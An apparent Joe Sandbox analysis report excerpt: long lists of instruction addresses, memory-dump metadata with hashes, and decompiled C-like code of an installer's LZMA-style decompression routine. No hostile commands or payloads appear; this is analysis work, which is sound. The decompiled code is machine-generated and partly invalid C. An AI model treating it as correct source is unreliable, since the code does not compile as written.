                                                            0x00406326
                                                            0x00406328
                                                            0x00000000
                                                            0x0040630a
                                                            0x0040630a
                                                            0x0040630d
                                                            0x00406310
                                                            0x00406313
                                                            0x00406315
                                                            0x00406315
                                                            0x00406315
                                                            0x00406318
                                                            0x0040631b
                                                            0x0040631d
                                                            0x0040631e
                                                            0x00406321
                                                            0x00000000
                                                            0x00406321
                                                            0x00000000
                                                            0x00406557
                                                            0x0040655b
                                                            0x00406579
                                                            0x0040657c
                                                            0x00406583
                                                            0x00406586
                                                            0x00406589
                                                            0x0040658c
                                                            0x0040658f
                                                            0x00406592
                                                            0x00406594
                                                            0x0040659b
                                                            0x0040659c
                                                            0x0040659e
                                                            0x004065a1
                                                            0x004065a4
                                                            0x004065a7
                                                            0x004065a7
                                                            0x004065ac
                                                            0x00000000
                                                            0x004065ac
                                                            0x0040655d
                                                            0x00406560
                                                            0x00406563
                                                            0x0040656d
                                                            0x00000000
                                                            0x00000000
                                                            0x004065c1
                                                            0x004065c5
                                                            0x004065e8
                                                            0x004065eb
                                                            0x004065ee
                                                            0x004065f8
                                                            0x004065c7
                                                            0x004065c7
                                                            0x004065ca
                                                            0x004065cd
                                                            0x004065d0
                                                            0x004065dd
                                                            0x004065e0
                                                            0x004065e0
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406675
                                                            0x00406679
                                                            0x00406680
                                                            0x00406683
                                                            0x00406686
                                                            0x00406690
                                                            0x00000000
                                                            0x00406690
                                                            0x0040667b
                                                            0x00000000
                                                            0x00000000
                                                            0x0040669c
                                                            0x004066a0
                                                            0x004066a7
                                                            0x004066aa
                                                            0x004066ad
                                                            0x004066a2
                                                            0x004066a2
                                                            0x004066a2
                                                            0x004066b0
                                                            0x004066b3
                                                            0x004066b6
                                                            0x004066b6
                                                            0x004066b9
                                                            0x004066bc
                                                            0x00000000
                                                            0x00000000
                                                            0x0040675c
                                                            0x0040675c
                                                            0x00406760
                                                            0x00406afe
                                                            0x00000000
                                                            0x00406afe
                                                            0x00406766
                                                            0x00406769
                                                            0x0040676c
                                                            0x00406770
                                                            0x00406773
                                                            0x00406779
                                                            0x0040677b
                                                            0x0040677b
                                                            0x0040677b
                                                            0x0040677e
                                                            0x00406781
                                                            0x00000000
                                                            0x00000000
                                                            0x00406351
                                                            0x00406351
                                                            0x00406355
                                                            0x00406ac2
                                                            0x00000000
                                                            0x00406ac2
                                                            0x0040635b
                                                            0x0040635e
                                                            0x00406361
                                                            0x00406365
                                                            0x00406368
                                                            0x0040636e
                                                            0x00406370
                                                            0x00406370
                                                            0x00406370
                                                            0x00406373
                                                            0x00406376
                                                            0x00406376
                                                            0x00406379
                                                            0x0040637c
                                                            0x00000000
                                                            0x00000000
                                                            0x00406382
                                                            0x00406388
                                                            0x00000000
                                                            0x00000000
                                                            0x0040638e
                                                            0x0040638e
                                                            0x00406392
                                                            0x00406395
                                                            0x00406398
                                                            0x0040639b
                                                            0x0040639e
                                                            0x0040639f
                                                            0x004063a2
                                                            0x004063a4
                                                            0x004063aa
                                                            0x004063ad
                                                            0x004063b0
                                                            0x004063b3
                                                            0x004063b6
                                                            0x004063b9
                                                            0x004063bc
                                                            0x004063d8
                                                            0x004063db
                                                            0x004063de
                                                            0x004063e1
                                                            0x004063e8
                                                            0x004063ec
                                                            0x004063ee
                                                            0x004063f2
                                                            0x004063be
                                                            0x004063be
                                                            0x004063c2
                                                            0x004063ca
                                                            0x004063cf
                                                            0x004063d1
                                                            0x004063d3
                                                            0x004063d3
                                                            0x004063f5
                                                            0x004063fc
                                                            0x004063ff
                                                            0x00000000
                                                            0x00406405
                                                            0x00000000
                                                            0x00406405
                                                            0x00000000
                                                            0x0040640a
                                                            0x0040640a
                                                            0x0040640e
                                                            0x00406ace
                                                            0x00000000
                                                            0x00406ace
                                                            0x00406414
                                                            0x00406417
                                                            0x0040641a
                                                            0x0040641e
                                                            0x00406421
                                                            0x00406427
                                                            0x00406429
                                                            0x00406429
                                                            0x00406429
                                                            0x0040642c
                                                            0x0040642f
                                                            0x0040642f
                                                            0x0040642f
                                                            0x00406435
                                                            0x00000000
                                                            0x00000000
                                                            0x00406437
                                                            0x0040643a
                                                            0x0040643d
                                                            0x00406440
                                                            0x00406443
                                                            0x00406446
                                                            0x00406449
                                                            0x0040644c
                                                            0x0040644f
                                                            0x00406452
                                                            0x00406455
                                                            0x0040646d
                                                            0x00406470
                                                            0x00406473
                                                            0x00406476
                                                            0x00406476
                                                            0x00406479
                                                            0x0040647d
                                                            0x0040647f
                                                            0x00406457
                                                            0x00406457
                                                            0x0040645f
                                                            0x00406464
                                                            0x00406466
                                                            0x00406468
                                                            0x00406468
                                                            0x00406482
                                                            0x00406489
                                                            0x0040648c
                                                            0x00000000
                                                            0x0040648e
                                                            0x00000000
                                                            0x0040648e
                                                            0x0040648c
                                                            0x00406493
                                                            0x00406493
                                                            0x00406493
                                                            0x00406493
                                                            0x00000000
                                                            0x00000000
                                                            0x004064ce
                                                            0x004064ce
                                                            0x004064d2
                                                            0x00406ada
                                                            0x00000000
                                                            0x00406ada
                                                            0x004064d8
                                                            0x004064db
                                                            0x004064de
                                                            0x004064e2
                                                            0x004064e5
                                                            0x004064eb
                                                            0x004064ed
                                                            0x004064ed
                                                            0x004064ed
                                                            0x004064f0
                                                            0x004064f3
                                                            0x004064f3
                                                            0x004064f9
                                                            0x00406497
                                                            0x00406497
                                                            0x0040649a
                                                            0x00000000
                                                            0x0040649a
                                                            0x004064fb
                                                            0x004064fb
                                                            0x004064fe
                                                            0x00406501
                                                            0x00406504
                                                            0x00406507
                                                            0x0040650a
                                                            0x0040650d
                                                            0x00406510
                                                            0x00406513
                                                            0x00406516
                                                            0x00406519
                                                            0x00406531
                                                            0x00406534
                                                            0x00406537
                                                            0x0040653a
                                                            0x0040653a
                                                            0x0040653d
                                                            0x00406541
                                                            0x00406543
                                                            0x0040651b
                                                            0x0040651b
                                                            0x00406523
                                                            0x00406528
                                                            0x0040652a
                                                            0x0040652c
                                                            0x0040652c
                                                            0x00406546
                                                            0x0040654d
                                                            0x00406550
                                                            0x00000000
                                                            0x00406552
                                                            0x00000000
                                                            0x00406552
                                                            0x00000000
                                                            0x004067df
                                                            0x004067df
                                                            0x004067e3
                                                            0x00406b0a
                                                            0x00000000
                                                            0x00406b0a
                                                            0x004067e9
                                                            0x004067ec
                                                            0x004067ef
                                                            0x004067f3
                                                            0x004067f6
                                                            0x004067fc
                                                            0x004067fe
                                                            0x004067fe
                                                            0x004067fe
                                                            0x00406801
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004068ee
                                                            0x004068f2
                                                            0x00406914
                                                            0x00406917
                                                            0x00406921
                                                            0x00000000
                                                            0x00406921
                                                            0x004068f4
                                                            0x004068f7
                                                            0x004068fb
                                                            0x004068fe
                                                            0x004068fe
                                                            0x00406901
                                                            0x00000000
                                                            0x00000000
                                                            0x004069ab
                                                            0x004069af
                                                            0x004069cd
                                                            0x004069cd
                                                            0x004069cd
                                                            0x004069d4
                                                            0x004069db
                                                            0x004069e2
                                                            0x004069e2
                                                            0x00000000
                                                            0x004069e2
                                                            0x004069b1
                                                            0x004069b4
                                                            0x004069b7
                                                            0x004069ba
                                                            0x004069c1
                                                            0x00406905
                                                            0x00406905
                                                            0x00406908
                                                            0x00000000
                                                            0x00000000
                                                            0x00406a9c
                                                            0x00406a9f
                                                            0x00000000
                                                            0x00000000
                                                            0x004066d6
                                                            0x004066d8
                                                            0x004066df
                                                            0x004066e0
                                                            0x004066e2
                                                            0x004066e5
                                                            0x00000000
                                                            0x00000000
                                                            0x004066ed
                                                            0x004066f0
                                                            0x004066f3
                                                            0x004066f5
                                                            0x004066f7
                                                            0x004066f7
                                                            0x004066f8
                                                            0x004066fb
                                                            0x00406702
                                                            0x00406705
                                                            0x00406713
                                                            0x00000000
                                                            0x00000000
                                                            0x004069e9
                                                            0x004069e9
                                                            0x004069ec
                                                            0x004069f3
                                                            0x00000000
                                                            0x00000000
                                                            0x004069f8
                                                            0x004069f8
                                                            0x004069fc
                                                            0x00406b34
                                                            0x00000000
                                                            0x00406b34
                                                            0x00406a02
                                                            0x00406a05
                                                            0x00406a08
                                                            0x00406a0c
                                                            0x00406a0f
                                                            0x00406a15
                                                            0x00406a17
                                                            0x00406a17
                                                            0x00406a17
                                                            0x00406a1a
                                                            0x00406a1d
                                                            0x00406a1d
                                                            0x00406a1d
                                                            0x00406a1d
                                                            0x00406a20
                                                            0x00406a20
                                                            0x00406a24
                                                            0x00406a84
                                                            0x00406a87
                                                            0x00406a8c
                                                            0x00406a8d
                                                            0x00406a8f
                                                            0x00406a91
                                                            0x00406a94
                                                            0x00000000
                                                            0x00406a94
                                                            0x00406a26
                                                            0x00406a2c
                                                            0x00406a2f
                                                            0x00406a32
                                                            0x00406a35
                                                            0x00406a38
                                                            0x00406a3b
                                                            0x00406a3e
                                                            0x00406a41
                                                            0x00406a44
                                                            0x00406a47
                                                            0x00406a60
                                                            0x00406a63
                                                            0x00406a66
                                                            0x00406a69
                                                            0x00406a6d
                                                            0x00406a6f
                                                            0x00406a6f
                                                            0x00406a70
                                                            0x00406a73
                                                            0x00406a49
                                                            0x00406a49
                                                            0x00406a51
                                                            0x00406a56
                                                            0x00406a58
                                                            0x00406a5b
                                                            0x00406a5b
                                                            0x00406a76
                                                            0x00406a7d
                                                            0x00000000
                                                            0x00406a7f
                                                            0x00000000
                                                            0x00406a7f
                                                            0x00000000
                                                            0x0040671b
                                                            0x0040671e
                                                            0x00406754
                                                            0x00406884
                                                            0x00406884
                                                            0x00406884
                                                            0x00406884
                                                            0x00406887
                                                            0x00406887
                                                            0x0040688a
                                                            0x0040688c
                                                            0x00406b16
                                                            0x00000000
                                                            0x00406b16
                                                            0x00406892
                                                            0x00406895
                                                            0x00000000
                                                            0x00000000
                                                            0x0040689b
                                                            0x0040689f
                                                            0x004068a2
                                                            0x004068a2
                                                            0x004068a2
                                                            0x00000000
                                                            0x004068a2
                                                            0x00406720
                                                            0x00406722
                                                            0x00406724
                                                            0x00406726
                                                            0x00406729
                                                            0x0040672a
                                                            0x0040672c
                                                            0x0040672e
                                                            0x00406731
                                                            0x00406734
                                                            0x0040674a
                                                            0x0040674f
                                                            0x00406787
                                                            0x00406787
                                                            0x0040678b
                                                            0x004067b7
                                                            0x004067b9
                                                            0x004067c0
                                                            0x004067c3
                                                            0x004067c6
                                                            0x004067c6
                                                            0x004067cb
                                                            0x004067cb
                                                            0x004067cd
                                                            0x004067d0
                                                            0x004067d7
                                                            0x004067da
                                                            0x00406807
                                                            0x00406807
                                                            0x0040680a
                                                            0x0040680d
                                                            0x00406881
                                                            0x00406881
                                                            0x00406881
                                                            0x00000000
                                                            0x00406881
                                                            0x0040680f
                                                            0x00406815
                                                            0x00406818
                                                            0x0040681b
                                                            0x0040681e
                                                            0x00406821
                                                            0x00406824
                                                            0x00406827
                                                            0x0040682a
                                                            0x0040682d
                                                            0x00406830
                                                            0x00406849
                                                            0x0040684b
                                                            0x0040684e
                                                            0x0040684f
                                                            0x00406852
                                                            0x00406854
                                                            0x00406857
                                                            0x00406859
                                                            0x0040685b
                                                            0x0040685e
                                                            0x00406860
                                                            0x00406863
                                                            0x00406867
                                                            0x00406869
                                                            0x00406869
                                                            0x0040686a
                                                            0x0040686d
                                                            0x00406870
                                                            0x00406832
                                                            0x00406832
                                                            0x0040683a
                                                            0x0040683f
                                                            0x00406841
                                                            0x00406844
                                                            0x00406844
                                                            0x00406873
                                                            0x0040687a
                                                            0x00406804
                                                            0x00406804
                                                            0x00406804
                                                            0x00406804
                                                            0x00000000
                                                            0x0040687c
                                                            0x00000000
                                                            0x0040687c
                                                            0x0040687a
                                                            0x0040678d
                                                            0x00406790
                                                            0x00406792
                                                            0x00406795
                                                            0x00406798
                                                            0x0040679b
                                                            0x0040679d
                                                            0x004067a0
                                                            0x004067a3
                                                            0x004067a3
                                                            0x004067a6
                                                            0x004067a6
                                                            0x004067a9
                                                            0x004067b0
                                                            0x00406784
                                                            0x00406784
                                                            0x00406784
                                                            0x00406784
                                                            0x00000000
                                                            0x004067b2
                                                            0x00000000
                                                            0x004067b2
                                                            0x004067b0
                                                            0x00406736
                                                            0x00406739
                                                            0x0040673b
                                                            0x0040673e
                                                            0x00000000
                                                            0x00000000
                                                            0x0040649d
                                                            0x0040649d
                                                            0x004064a1
                                                            0x00406ae6
                                                            0x00000000
                                                            0x00406ae6
                                                            0x004064a7
                                                            0x004064aa
                                                            0x004064ad
                                                            0x004064b0
                                                            0x004064b3
                                                            0x004064b6
                                                            0x004064b9
                                                            0x004064bb
                                                            0x004064be
                                                            0x004064c1
                                                            0x004064c4
                                                            0x004064c6
                                                            0x004064c6
                                                            0x004064c6
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004068a5
                                                            0x004068a5
                                                            0x004068a5
                                                            0x004068a9
                                                            0x00000000
                                                            0x00000000
                                                            0x004068af
                                                            0x004068b2
                                                            0x004068b5
                                                            0x004068b8
                                                            0x004068ba
                                                            0x004068ba
                                                            0x004068ba
                                                            0x004068bd
                                                            0x004068c0
                                                            0x004068c3
                                                            0x004068c6
                                                            0x004068c9
                                                            0x004068cc
                                                            0x004068cd
                                                            0x004068cf
                                                            0x004068cf
                                                            0x004068cf
                                                            0x004068d2
                                                            0x004068d5
                                                            0x004068d8
                                                            0x004068db
                                                            0x004068de
                                                            0x004068e2
                                                            0x004068e4
                                                            0x004068e7
                                                            0x00000000
                                                            0x004068e9
                                                            0x00000000
                                                            0x004068e9
                                                            0x004068e7
                                                            0x00406b1c
                                                            0x00000000
                                                            0x00000000
                                                            0x0040614b

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ec44333397786e712ce86ed3a064858ade4f3ed38e69d8951d19f407b84ebf46
                                                            • Instruction ID: e5fca131ad03ef0b1cae302aca876d249310e041a0af9db6593aad5c0906a822
                                                            • Opcode Fuzzy Hash: ec44333397786e712ce86ed3a064858ade4f3ed38e69d8951d19f407b84ebf46
                                                            • Instruction Fuzzy Hash: DA814571E04228CFDF24CFA8C8447ADBBB1FB45305F25816AD416BB281D7789A96DF44
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 98%
                                                            			E00406557() {
                                                            				signed int _t539;
                                                            				unsigned short _t540;
                                                            				signed int _t541;
                                                            				void _t542;
                                                            				signed int _t543;
                                                            				signed int _t544;
                                                            				signed int _t573;
                                                            				signed int _t576;
                                                            				signed int _t597;
                                                            				signed int* _t614;
                                                            				void* _t621;
                                                            
                                                            				L0:
                                                            				while(1) {
                                                            					L0:
                                                            					if( *(_t621 - 0x40) != 1) {
                                                            						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                                                            						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                                                            						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                                                            						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                                                            						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                                                            						_t539 =  *(_t621 - 4) + 0x664;
                                                            						 *(_t621 - 0x58) = _t539;
                                                            						goto L68;
                                                            					} else {
                                                            						 *(__ebp - 0x84) = 8;
                                                            						while(1) {
                                                            							L132:
                                                            							 *(_t621 - 0x54) = _t614;
                                                            							while(1) {
                                                            								L133:
                                                            								_t540 =  *_t614;
                                                            								_t597 = _t540 & 0x0000ffff;
                                                            								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                            								if( *(_t621 - 0xc) >= _t573) {
                                                            									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                            									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                            									 *(_t621 - 0x40) = 1;
                                                            									_t541 = _t540 - (_t540 >> 5);
                                                            									 *_t614 = _t541;
                                                            								} else {
                                                            									 *(_t621 - 0x10) = _t573;
                                                            									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                            									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                            								}
                                                            								if( *(_t621 - 0x10) >= 0x1000000) {
                                                            									goto L139;
                                                            								}
                                                            								L137:
                                                            								if( *(_t621 - 0x6c) == 0) {
                                                            									 *(_t621 - 0x88) = 5;
                                                            									L170:
                                                            									_t576 = 0x22;
                                                            									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                                                            									_t544 = 0;
                                                            									L172:
                                                            									return _t544;
                                                            								}
                                                            								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                                                            								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                            								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                            								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                            								L139:
                                                            								_t542 =  *(_t621 - 0x84);
                                                            								while(1) {
                                                            									 *(_t621 - 0x88) = _t542;
                                                            									while(1) {
                                                            										L1:
                                                            										_t543 =  *(_t621 - 0x88);
                                                            										if(_t543 > 0x1c) {
                                                            											break;
                                                            										}
                                                            										switch( *((intOrPtr*)(_t543 * 4 +  &M00406B5B))) {
                                                            											case 0:
                                                            												if( *(_t621 - 0x6c) == 0) {
                                                            													goto L170;
                                                            												}
                                                            												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                            												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                            												_t543 =  *( *(_t621 - 0x70));
                                                            												if(_t543 > 0xe1) {
                                                            													goto L171;
                                                            												}
                                                            												_t547 = _t543 & 0x000000ff;
                                                            												_push(0x2d);
                                                            												asm("cdq");
                                                            												_pop(_t578);
                                                            												_push(9);
                                                            												_pop(_t579);
                                                            												_t617 = _t547 / _t578;
                                                            												_t549 = _t547 % _t578 & 0x000000ff;
                                                            												asm("cdq");
                                                            												_t612 = _t549 % _t579 & 0x000000ff;
                                                            												 *(_t621 - 0x3c) = _t612;
                                                            												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                                                            												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                                                            												_t620 = (0x300 << _t612 + _t617) + 0x736;
                                                            												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                                                            													L10:
                                                            													if(_t620 == 0) {
                                                            														L12:
                                                            														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                                                            														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                            														goto L15;
                                                            													} else {
                                                            														goto L11;
                                                            													}
                                                            													do {
                                                            														L11:
                                                            														_t620 = _t620 - 1;
                                                            														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                                                            													} while (_t620 != 0);
                                                            													goto L12;
                                                            												}
                                                            												if( *(_t621 - 4) != 0) {
                                                            													GlobalFree( *(_t621 - 4));
                                                            												}
                                                            												_t543 = GlobalAlloc(0x40, 0x600); // executed
                                                            												 *(_t621 - 4) = _t543;
                                                            												if(_t543 == 0) {
                                                            													goto L171;
                                                            												} else {
                                                            													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                                                            													goto L10;
                                                            												}
                                                            											case 1:
                                                            												L13:
                                                            												__eflags =  *(_t621 - 0x6c);
                                                            												if( *(_t621 - 0x6c) == 0) {
                                                            													 *(_t621 - 0x88) = 1;
                                                            													goto L170;
                                                            												}
                                                            												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                            												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                                                            												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                            												_t45 = _t621 - 0x48;
                                                            												 *_t45 =  *(_t621 - 0x48) + 1;
                                                            												__eflags =  *_t45;
                                                            												L15:
                                                            												if( *(_t621 - 0x48) < 4) {
                                                            													goto L13;
                                                            												}
                                                            												_t555 =  *(_t621 - 0x40);
                                                            												if(_t555 ==  *(_t621 - 0x74)) {
                                                            													L20:
                                                            													 *(_t621 - 0x48) = 5;
                                                            													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                                                            													goto L23;
                                                            												}
                                                            												 *(_t621 - 0x74) = _t555;
                                                            												if( *(_t621 - 8) != 0) {
                                                            													GlobalFree( *(_t621 - 8));
                                                            												}
                                                            												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                                                            												 *(_t621 - 8) = _t543;
                                                            												if(_t543 == 0) {
                                                            													goto L171;
                                                            												} else {
                                                            													goto L20;
                                                            												}
                                                            											case 2:
                                                            												L24:
                                                            												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                                                            												 *(_t621 - 0x84) = 6;
                                                            												 *(_t621 - 0x4c) = _t562;
                                                            												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                                                            												goto L132;
                                                            											case 3:
                                                            												L21:
                                                            												__eflags =  *(_t621 - 0x6c);
                                                            												if( *(_t621 - 0x6c) == 0) {
                                                            													 *(_t621 - 0x88) = 3;
                                                            													goto L170;
                                                            												}
                                                            												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                            												_t67 = _t621 - 0x70;
                                                            												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                                                            												__eflags =  *_t67;
                                                            												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                            												L23:
                                                            												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                                                            												if( *(_t621 - 0x48) != 0) {
                                                            													goto L21;
                                                            												}
                                                            												goto L24;
                                                            											case 4:
                                                            												L133:
                                                            												_t540 =  *_t614;
                                                            												_t597 = _t540 & 0x0000ffff;
                                                            												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                            												if( *(_t621 - 0xc) >= _t573) {
                                                            													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                            													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                            													 *(_t621 - 0x40) = 1;
                                                            													_t541 = _t540 - (_t540 >> 5);
                                                            													 *_t614 = _t541;
                                                            												} else {
                                                            													 *(_t621 - 0x10) = _t573;
                                                            													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                            													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                            												}
                                                            												if( *(_t621 - 0x10) >= 0x1000000) {
                                                            													goto L139;
                                                            												}
                                                            											case 5:
                                                            												goto L137;
                                                            											case 6:
                                                            												__edx = 0;
                                                            												__eflags =  *(__ebp - 0x40);
                                                            												if( *(__ebp - 0x40) != 0) {
                                                            													__eax =  *(__ebp - 4);
                                                            													__ecx =  *(__ebp - 0x38);
                                                            													 *(__ebp - 0x34) = 1;
                                                            													 *(__ebp - 0x84) = 7;
                                                            													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                            													L132:
                                                            													 *(_t621 - 0x54) = _t614;
                                                            													goto L133;
                                                            												}
                                                            												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                            												__esi =  *(__ebp - 0x60);
                                                            												__cl = 8;
                                                            												__cl = 8 -  *(__ebp - 0x3c);
                                                            												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                            												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                            												__ecx =  *(__ebp - 0x3c);
                                                            												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                            												__ecx =  *(__ebp - 4);
                                                            												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                            												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                            												__eflags =  *(__ebp - 0x38) - 4;
                                                            												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                            												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                            												if( *(__ebp - 0x38) >= 4) {
                                                            													__eflags =  *(__ebp - 0x38) - 0xa;
                                                            													if( *(__ebp - 0x38) >= 0xa) {
                                                            														_t98 = __ebp - 0x38;
                                                            														 *_t98 =  *(__ebp - 0x38) - 6;
                                                            														__eflags =  *_t98;
                                                            													} else {
                                                            														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                            													}
                                                            												} else {
                                                            													 *(__ebp - 0x38) = 0;
                                                            												}
                                                            												__eflags =  *(__ebp - 0x34) - __edx;
                                                            												if( *(__ebp - 0x34) == __edx) {
                                                            													__ebx = 0;
                                                            													__ebx = 1;
                                                            													goto L61;
                                                            												} else {
                                                            													__eax =  *(__ebp - 0x14);
                                                            													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            													__eflags = __eax -  *(__ebp - 0x74);
                                                            													if(__eax >=  *(__ebp - 0x74)) {
                                                            														__eax = __eax +  *(__ebp - 0x74);
                                                            														__eflags = __eax;
                                                            													}
                                                            													__ecx =  *(__ebp - 8);
                                                            													__ebx = 0;
                                                            													__ebx = 1;
                                                            													__al =  *((intOrPtr*)(__eax + __ecx));
                                                            													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                            													goto L41;
                                                            												}
                                                            											case 7:
                                                            												goto L0;
                                                            											case 8:
                                                            												__eflags =  *(__ebp - 0x40);
                                                            												if( *(__ebp - 0x40) != 0) {
                                                            													__eax =  *(__ebp - 4);
                                                            													__ecx =  *(__ebp - 0x38);
                                                            													 *(__ebp - 0x84) = 0xa;
                                                            													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                            												} else {
                                                            													__eax =  *(__ebp - 0x38);
                                                            													__ecx =  *(__ebp - 4);
                                                            													__eax =  *(__ebp - 0x38) + 0xf;
                                                            													 *(__ebp - 0x84) = 9;
                                                            													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                            													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                            												}
                                                            												while(1) {
                                                            													L132:
                                                            													 *(_t621 - 0x54) = _t614;
                                                            													goto L133;
                                                            												}
                                                            											case 9:
                                                            												__eflags =  *(__ebp - 0x40);
                                                            												if( *(__ebp - 0x40) != 0) {
                                                            													goto L89;
                                                            												}
                                                            												__eflags =  *(__ebp - 0x60);
                                                            												if( *(__ebp - 0x60) == 0) {
                                                            													goto L171;
                                                            												}
                                                            												__eax = 0;
                                                            												__eflags =  *(__ebp - 0x38) - 7;
                                                            												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                            												__eflags = _t258;
                                                            												0 | _t258 = _t258 + _t258 + 9;
                                                            												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                            												goto L75;
                                                            											case 0xa:
                                                            												__eflags =  *(__ebp - 0x40);
                                                            												if( *(__ebp - 0x40) != 0) {
                                                            													__eax =  *(__ebp - 4);
